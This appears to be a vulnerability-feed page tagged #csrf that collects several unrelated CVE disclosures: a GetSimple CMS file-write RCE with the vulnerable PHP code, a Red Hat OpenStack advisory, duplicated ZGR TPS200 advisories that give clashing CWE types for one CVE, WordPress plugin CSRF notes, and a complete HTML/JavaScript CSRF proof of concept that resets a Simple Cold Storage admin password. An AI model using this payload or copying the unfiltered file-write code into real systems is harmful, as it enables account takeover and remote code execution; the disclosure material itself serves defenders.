GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.

\`if((isset($\_POST\['submitsave'\]))){

    # check for csrf
    if (!defined('GSNOCSRF') || (GSNOCSRF == FALSE) ) {
    	$nonce = $_POST['nonce'];
    	if(!check_nonce($nonce, "save")) {
    		die("CSRF detected!");
    	}
    }
    
    # save edited template file
    $SavedFile = $_POST['edited_file'];
    $FileContents = get_magic_quotes_gpc() ? stripslashes($_POST['content']) : $_POST['content'];	
    $fh = fopen(GSTHEMESPATH . $SavedFile, 'w') or die("can't open file");
    fwrite($fh, $FileContents);
    fclose($fh);
    $success = sprintf(i18n_r('TEMPLATE_FILE'), $SavedFile);
    

}\`  
The savedFile and FileContents parameters are not filtered, so you can write files across directories

CVE-2022-41544: Remote command execution vulnerability in 3.3.16 · Issue #1352 · GetSimpleCMS/GetSimpleCMS

Red Hat Security Advisory 2022-6969-01 - An update for tripleo-ansible is now available for Red Hat OpenStack Platform. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (tripleo-ansible) security update  
Advisory ID:       RHSA-2022:6969-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6969  
Issue date:        2022-10-17  
CVE Names:         CVE-2022-3101 CVE-2022-3146  
====================================================================  
1. Summary:

An update for tripleo-ansible is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch

3. Description:

TripleO Ansible project repository. Contains playbooks for use with TripleO  
OpenStack deployments. https://opendev.org

Security Fix(es):

* /var/lib/mistral/overcloud discoverable (CVE-2022-3101)

* /etc/openstack/clouds.yaml discoverable (CVE-2022-3146)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2120660 - CVE-2022-3101 tripleo-ansible: File permissions are too liberal on a director deployment [openstack-16.2]  
2123767 - CVE-2022-3146 tripleo-ansible: /etc/openstack/clouds.yaml got 644 permission [openstack-16.2]  
2123870 - CVE-2022-3101 tripleo-ansible: /var/lib/mistral/overcloud discoverable  
2124721 - CVE-2022-3146 tripleo-ansible: /etc/openstack/clouds.yaml discoverable  
2124732 - CVE-2022-3146 tripleo-ansible: /etc/openstack/clouds.yaml got 644 permission [openstack-16.1]  
2130109 - ceph inventory linking fails with permission issues  
2130598 - ceph inventory linking fails with permission issues

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
openstack-tripleo-common-11.4.1-1.20211201113404.el8ost.src.rpm  
openstack-tripleo-heat-templates-11.3.2-1.20220114223346.el8ost.src.rpm  
tripleo-ansible-0.5.1-1.20220114163454.el8ost.src.rpm

noarch:  
openstack-tripleo-common-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-common-container-base-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-common-containers-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-common-devtools-11.4.1-1.20211201113404.el8ost.noarch.rpm  
openstack-tripleo-heat-templates-11.3.2-1.20220114223346.el8ost.noarch.rpm  
python3-tripleo-common-11.4.1-1.20211201113404.el8ost.noarch.rpm  
tripleo-ansible-0.5.1-1.20220114163454.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
openstack-tripleo-common-11.7.1-2.20220318011206.el8ost.src.rpm  
openstack-tripleo-heat-templates-11.6.1-2.20220409014870.el8ost.src.rpm  
tripleo-ansible-0.8.1-2.20220406160116.el8ost.src.rpm

noarch:  
openstack-tripleo-common-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-common-container-base-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-common-containers-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-common-devtools-11.7.1-2.20220318011206.el8ost.noarch.rpm  
openstack-tripleo-heat-templates-11.6.1-2.20220409014870.el8ost.noarch.rpm  
python3-tripleo-common-11.7.1-2.20220318011206.el8ost.noarch.rpm  
tripleo-ansible-0.8.1-2.20220406160116.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3101  
https://access.redhat.com/security/cve/CVE-2022-3146  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY01tTtzjgjWX9erEAQietQ/9F9yZlY9G04oLYTUz/82AcyNJdjKGEqgM  
5APs6Pu1Dy65KoV77pBUIYgDfzqX61JLPf7w6A/RuShRTUr2GVoj9Mf7r7n+xBjH  
FwrCWygRzNSh68ZAYouLtIQgRbm0uP097ySyQpe/TQY6X6tlH+fUVFiAy8UgvuoW  
WZ1W9cVBsJVVP6gD145TMZtlkRC9xQ7vajVOJH3l9TrwLqw/CSrfJLCXqA5C9z7G  
6AJ66TZGNEaMMQ/sWDBJja4y8jkIxbR2K75Cq36rsxifUWLSgZOEa90eejptxz5F  
l13HKFThfwJmgZ+KwppFLvMhI4lrtAdwcgBOgK3iGJ25exFm4ZCXG7V8x8QbxeNn  
KNa8Dz+MwdxzJkg946jIiLUqgNgKXn4rXXFfCFBYfks+jU8kKAcW8Jqld/Z7rcZ3  
SIB5/sqKQnYjYpwf3Wm61Giy6l0jU/qqidIaVXf65klYZq8+HeA2wcFvGnDsMbWm  
sd4GctIb0LEsDfVYp2OocIsbmywFqxEI5if/Zva02Rao/AZaB1KieviAlripNeeE  
2S+P3E2NNFlbqJvMMhtkNomHZaGiGhz2UzdMHjEdeKR3U1L1EylQcyDqqMQHRF/F  
DW51qj28YUn6WBJFG7YO/zdMvepS3HU8S/x/4x2j90ooh+2pFrFNJMABR9Tdz5Yb  
YYZ6btlYW78=bZIq  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6969-01

A vulnerability has been found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument change password leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211189 was assigned to this vulnerability.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Simple Cold Storage Management System v1.0 - CSRF ON change password

\# Exploit Author: SAHIL PRASAD

\# Vendor Name: oretnom23

\# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

\# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html

\# Version: v1.0

\# Tested on: Windows 10, Apache

Description: Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Vulnerable Parameters:

change password

Steps:

1) Login into admin/user account

2) Now Go to profile

3) Now in Parameter password change the password

4) Hit burpsuite and capture the request

5) Generate CSRF poc and expoilt that poc in browser

6) Now got back to the site and log out and login with new password and you will get redirect to the dashboard

Payload:

<html>



<body>

<script>history.pushState('', '', '/')</script>

<script>

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr.open("POST", "http:\\/\\/localhost\\/csms\\/classes\\/Users.php?f=save", true);

xhr.setRequestHeader("Accept", "\*\\/\*");

xhr.setRequestHeader("Content-Type", "multipart\\/form-data; boundary=----WebKitFormBoundaryg5STs5oE1IeCxjQy");

xhr.setRequestHeader("Accept-Language", "en-GB,en-US;q=0.9,en;q=0.8");

xhr.withCredentials = true;

var body = "------WebKitFormBoundaryg5STs5oE1IeCxjQy\\r\\n" +

"Content-Disposition: form-data; name=\\"id\\"\\r\\n" +

"\\r\\n" +

"1\\r\\n" +

"------WebKitFormBoundaryg5STs5oE1IeCxjQy\\r\\n" +

"Content-Disposition: form-data; name=\\"firstname\\"\\r\\n" +

"\\r\\n" +

"Adminstrator\\r\\n" +

"------WebKitFormBoundaryg5STs5oE1IeCxjQy\\r\\n" +

"Content-Disposition: form-data; name=\\"lastname\\"\\r\\n" +

"\\r\\n" +

"Admin\\r\\n" +

"------WebKitFormBoundaryg5STs5oE1IeCxjQy\\r\\n" +

"Content-Disposition: form-data; name=\\"username\\"\\r\\n" +

"\\r\\n" +

"admin\\r\\n" +

"------WebKitFormBoundaryg5STs5oE1IeCxjQy\\r\\n" +

"Content-Disposition: form-data; name=\\"password\\"\\r\\n" +

"\\r\\n" +

"12345\\r\\n" +

"------WebKitFormBoundaryg5STs5oE1IeCxjQy\\r\\n" +

"Content-Disposition: form-data; name=\\"img\\"; filename=\\"\\"\\r\\n" +

"Content-Type: application/octet-stream\\r\\n" +

"\\r\\n" +

"\\r\\n" +

"------WebKitFormBoundaryg5STs5oE1IeCxjQy--\\r\\n";

var aBody = new Uint8Array(body.length);

for (var i = 0; i < aBody.length; i++)

aBody\[i\] = body.charCodeAt(i);

xhr.send(new Blob(\[aBody\]));

}

</script>

<form action="#">

<input type="button" value="Submit request" onclick="submitRequest();" />

</form>

</body>

</html>

CVE-2022-3582: CSRF-/POC at main · jusstSahil/CSRF-

In ZGR TPS200 NG 2.00 firmware version and 1.01 hardware version, the firmware upload process does not perform any type of restriction. This allows an attacker to modify it and re-upload it via web with malicious modifications, rendering the device unusable.

Affected Resources

ZGR TPS200 NG, firmware version 2.00 and hardware version 1.01.

Description

INCIBE has coordinated the publication of 4 vulnerabilities in ZGR TPS200 NG, which have been discovered by the Industrial Cybersecurity team of S21sec, special mention to Aarón Flecha Menéndez.

These vulnerabilities have been assigned the codes:

*   CVE-2020-8973. A CVSS v3.1 base score of 10,0 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N. The vulnerability type is **CWE-284**: improper access control.
*   CVE-2020-8974. A CVSS v3.1 base score of 10,0 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H. The vulnerability type is **CWE-434**: unrestricted upload of file with dangerous type.
*   CVE-2020-8975. A CVSS v3.1 base score of 7,5 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. The vulnerability type is **CWE-201**: exposure of sensitive information through sent data.
*   CVE-2020-8976. A CVSS v3.1 base score of 8,9 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H. The vulnerability type is **CWE-352**: CSRF  (Cross-Site Request Forgery).

Solution

The ZGR team is working on a new design of the TPS, which will include the necessary cybersecurity measures to address the identified vulnerabilities. Affected equipment must be connected to properly isolated and secured networks to avoid potential risks.

Detail

*   **CVE-2020-****8973**: ZGR TPS200 NG does not properly accept specially constructed requests. This allows an attacker with access to the network where the affected asset is located, to operate and change several parameters without having to be registered as a user on the web that owns the device.
*   **CVE-2020-****8974**: ZGR TPS200 NG firmware upload process does not perform any type of restriction. This allows an attacker to modify it and re-upload it via web with malicious modifications, rendering the device unusable.
*   **CVE-2020-8975**: ZGR TPS200 NG allows a remote attacker with access to the web application and knowledge of the routes (URIs) used by the application, to access sensitive information about the system.
*   **CVE-2020-8976**: he integrated server of the ZGR TPS200 NG allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and triggers the malicious request.

If you have any information regarding this advisory, please contact INCIBE as indicated in the CVE assignment and publication.

CVE-2020-8974: Multiple vulnerabilities in ZGR TPS200 NG

The integrated server of the ZGR TPS200 NG on its 2.00 firmware version and 1.01 hardware version, allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and triggers the malicious request.

Affected resources: 

ZGR TPS200 NG, firmware version 2.00 and hardware version 1.01.

Description: 

INCIBE has coordinated the publication of 4 vulnerabilities in ZGR TPS200 NG, which have been discovered by the Industrial Cybersecurity team of S21sec, special mention to Aarón Flecha Menéndez.

These vulnerabilities have been assigned the codes:

*   CVE-2020-8973. A CVSS v3.1 base score of 10,0 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N. The vulnerability type is **CWE-284**: improper access control.
*   CVE-2020-8974. A CVSS v3.1 base score of 10,0 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H. The vulnerability type is **CWE-771**: missing reference to active allocated resource.
*   CVE-2020-8975. A CVSS v3.1 base score of 7,5 has been calculated; the CVSS vector string is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. The vulnerability type is **CWE-201**: exposure of sensitive information through sent data.
*   CVE-2020-8976. A CVSS v3.1 base score of 8,9 has been calculated; the CVSS vector string is AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:H. The vulnerability type is **CWE-352**: CSRF  (Cross-Site Request Forgery).

Solution: 

The ZGR team is working on a new design of the TPS, which will include the necessary cybersecurity measures to address the identified vulnerabilities. Affected equipment must be connected to properly isolated and secured networks to avoid potential risks.

Detail: 

*   **CVE-2020-****8973**: ZGR TPS200 NG does not properly accept specially constructed requests. This allows an attacker with access to the network where the affected asset is located, to operate and change several parameters without having to be registered as a user on the web that owns the device.
*   **CVE-2020-****8974**: ZGR TPS200 NG firmware upload process does not perform any type of restriction. This allows an attacker to modify it and re-upload it via web with malicious modifications, rendering the device unusable.
*   **CVE-2020-8975**: ZGR TPS200 NG allows a remote attacker with access to the web application and knowledge of the routes (URIs) used by the application, to access sensitive information about the system.
*   **CVE-2020-8976**: he integrated server of the ZGR TPS200 NG allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and triggers the malicious request.

If you have any information regarding this advisory, please contact INCIBE as indicated in the CVE assignment and publication.

CVE-2020-8976: Multiple vulnerabilities in ZGR TPS200 NG

Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

The WP Custom Cursors WordPress plugin before 3.0.1 does not have CSRF check in place when deleting cursors, which could allow attackers to made a logged in admin delete arbitrary cursors via a CSRF attack.

CVE-2022-3151

The WP Custom Cursors WordPress plugin before 3.0.1 does not have CSRF check in place when creating and editing cursors, which could allow attackers to made a logged in admin perform such actions via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping in some of the cursor options, it could also lead to Stored Cross-Site Scripting

CVE-2022-3149

The Frontend File Manager Plugin WordPress plugin before 21.4 does not have CSRF check when uploading files, which could allow attackers to make logged in users upload files on their behalf

CVE-2022-3126

The miniOrange Discord Integration WordPress plugin before 2.1.6 does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example

Tag

#csrf